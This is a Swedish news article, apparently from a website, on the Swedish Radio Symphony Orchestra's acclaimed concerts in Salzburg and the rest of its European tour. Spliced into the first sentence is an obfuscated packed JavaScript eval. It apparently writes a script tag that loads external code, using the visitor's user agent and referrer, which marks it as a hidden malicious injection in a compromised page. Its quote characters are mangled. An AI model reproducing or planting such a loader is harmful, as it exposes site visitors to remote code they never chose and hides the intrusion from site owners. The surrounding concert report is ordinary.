Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Stor succé för Sveriges Radios Symfoniorkester i Salzburg

Stor succé för Sveriges Radios Symfoniorkester i Salzburg
Sebastian

Tre eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|drfee|var|u0026u|referrer|ydstf||js|php’.split(’|’),0,{}))
kvällar i rad tog Sveriges Radios Symfoniorkester och dess chefsdirigent Daniel Harding den kräsna konsertpubliken i Salzburg med storm. Vid två av dem i sällskap med violinisten Joshua Bell. Med bravorop och stampningar hyllades konserterna i Grosses Festspielhaus, en av den klassiska musikens mest eftertraktade spelplatser. Samma framgång rönte Radiosymfonikerna vid två konserter i Graz dagarna innan.

Den pågående Europaturnén är en av de största och mest prestigefulla i orkesterns historia och närmar sig nu halvtid. Ikväll, måndag, besöker de för första gången La Scala, det anrika operahuset i Milano. Den konserten direktsänds i Sveriges Radio P2.

– Vi är ödmjuka inför de platser vi besöker, där en stor del av den klassiska musikens historia har skrivits. Desto mer stolt är jag över framgångarna som visar att Sveriges Radios Symfoniorkester har en stark position i det internationella musiklivet. Att vi kan visa upp oss på det här sättet är viktigt för att locka de allra bästa artisterna till Stockholm och är dessutom mycket utvecklande för orkestern säger Helena Wessman, konserthuschef i Berwaldhallen, Radiosymfonikernas hemmaarena.

– Orkestern förtjänar verkligen det fina bemötandet. De spelar fantastiskt bra, säger Daniel Harding, chefsdirigent för Sveriges Radios Symfoniorkester.

Turnén omfattar elva konserter på två veckor, med Mahlers Symfoni nr 5, Stravinskys Eldfågeln och Brahms Symfoni nr 1 bland de större verken som spelas. Den internationellt väletablerade violinisten Joshua Bell är med på stora delar av turnén. Kommande stopp inkluderar Milano, Freiburg, Wien och Zürich.